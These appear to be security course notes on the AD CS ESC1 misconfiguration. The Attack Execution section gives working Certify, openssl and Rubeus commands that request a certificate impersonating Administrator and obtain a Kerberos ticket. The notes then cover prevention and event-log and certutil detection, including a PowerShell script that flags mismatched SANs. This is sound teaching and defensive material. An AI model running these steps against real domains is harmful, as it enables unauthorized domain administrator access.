PKI - ESC1

Description

The Certified Pre-Owned research paper by SpecterOps highlighted Active Directory Certificate Services (AD CS) as an attractive attack vector because of how commonly it is misconfigured. Certificates are highly advantageous for attackers because:

  • Certificates are valid long-term, often for a year or more.

  • User password resets don’t invalidate certificates.

  • Misconfigured templates allow attackers to obtain certificates for other users.

  • Compromising a Certificate Authority (CA) private key enables forging "Golden Certificates."

One notable privilege escalation method is ESC1. It requires a certificate template that combines:

  • No issuance requirements (no manager approval needed).

  • An EKU that permits client authentication or smart card logon, with enrollment rights granted to low-privileged users.

  • The CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT flag, which lets the requester choose the subject and SAN of the certificate.

Attack Execution: ESC1 Example

  1. Scan for Vulnerabilities with Certify:

    .\Certify.exe find /vulnerable

    The output will identify vulnerable certificate templates. Here, UserCert is identified as vulnerable due to:

    • Accessible by all domain users.

    • Requester-supplied SAN is allowed (so the certificate can impersonate other users).

    • No manager approval required.

    • Supports client authentication for login.

  2. Abuse the Template by requesting a certificate for the "Administrator" user:

    .\Certify.exe request /ca:PKI.eagle.local\eagle-PKI-CA /template:UserCert /altname:Administrator

    This writes the certificate and its private key in PEM format; Rubeus needs a PFX, so the next step converts it.

  3. Convert PEM to PFX:

    sed -i 's/\s\s\+/\n/g' cert.pem
    openssl pkcs12 -in cert.pem -keyex -CSP "Microsoft Enhanced Cryptographic Provider v1.0" -export -out cert.pfx

  4. Use Rubeus to Request a TGT for the Administrator account:

    .\Rubeus.exe asktgt /domain:eagle.local /user:Administrator /certificate:cert.pfx /dc:dc1.eagle.local /ptt

    Successful authentication as the Administrator will allow access to resources on DC1, such as listing contents of \\dc1\c$.

Prevention

Preventing the ESC1 attack involves:

  • Disabling CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT in certificate templates.

  • Enforcing CA certificate manager approval for certificate issuance to ensure only legitimate requests are approved.

Regular PKI environment scans with Certify or similar tools are recommended to identify and mitigate PKI misconfigurations.

Detection

  1. Event IDs 4886 and 4887: with Certification Services auditing enabled, the CA's Security log records certificate requests (4886) and certificate issuance (4887). These events show that a certificate was requested and issued but do not include the SAN values.

  2. Listing Issued Certificates: Checking the CA’s issued certificate list can reveal certificates issued with the vulnerable template, although SAN details require manual review.

  3. Event ID 4768: logged on the domain controller when the certificate is used to request a TGT, as in the Rubeus step above.

To query the CA database from the command line instead of the GUI, use certutil:

certutil -view

Example to retrieve the events programmatically:

$events = Get-WinEvent -FilterHashtable @{Logname='Security'; ID='4886'}
$events[0] | Format-List -Property *
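Because neither 4886 nor 4887 carries the SAN, the check that actually surfaces an ESC1-style request is comparing each issued certificate's SAN UPN with the account that requested it. The following PowerShell is an added example, not part of the original notes; it assumes the CA database exposes the SAN UPN as the "UPN" column (confirm with certutil -schema) and uses the page's eagle.local suffix.

```powershell
# Added example: flag issued certificates whose SAN UPN does not belong to the
# requesting account. Run on the CA itself (or inside the PSSession shown below).
# Assumptions (verify with: certutil -schema): the "UPN" column holds the SAN UPN,
# and Disposition 20 means "issued".

function Get-SuspiciousCertificateRequests {
    param([string]$DomainSuffix = 'eagle.local')   # assumed suffix, matches the lab on this page

    # Pull the issued-certificate rows as CSV. -Skip 1 drops certutil's own header
    # line so we can assign stable property names instead of its display names.
    $rows = certutil -view -restrict "Disposition=20" `
        -out "RequestID,RequesterName,UPN,CertificateTemplate,NotBefore" csv |
        Select-Object -Skip 1 |
        ConvertFrom-Csv -Header RequestID,RequesterName,UPN,Template,NotBefore

    foreach ($r in $rows) {
        # No UPN in the SAN (e.g. machine certificates): not the ESC1 pattern.
        if ([string]::IsNullOrWhiteSpace($r.UPN)) { continue }

        # RequesterName is DOMAIN\sAMAccountName; compare the account part with the UPN prefix.
        $requester = ($r.RequesterName -split '\\')[-1]
        $upnUser, $upnDomain = $r.UPN -split '@', 2

        # PowerShell string comparison is case-insensitive by default.
        $mismatch = ($requester -ne $upnUser) -or
                    ($upnDomain -and $upnDomain -ne $DomainSuffix)

        if ($mismatch) {
            [pscustomobject]@{
                RequestID = $r.RequestID
                Requester = $r.RequesterName
                SanUPN    = $r.UPN
                Template  = $r.Template
                Issued    = $r.NotBefore
            }
        }
    }
}

# A low-privileged requester paired with Administrator@eagle.local is the ESC1 signature.
Get-SuspiciousCertificateRequests | Format-Table -AutoSize
```

Treat the output as a triage list rather than a verdict: accounts whose UPN prefix legitimately differs from their sAMAccountName will appear too, so correlate hits with a 4768 event for the SAN account on the domain controller.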

Remote Session Monitoring

If direct GUI access is unavailable, use PSSession to access the PKI machine and query for certificate issuance events:

New-PSSession -ComputerName PKI
Enter-PSSession -ComputerName PKI
Get-WinEvent -FilterHashtable @{Logname='Security'; ID='4886'}
Get-WinEvent -FilterHashtable @{Logname='Security'; ID='4887'}

Note: Monitoring and auditing PKI activities for unauthorized certificate issuance is critical to maintaining a secure AD CS environment.
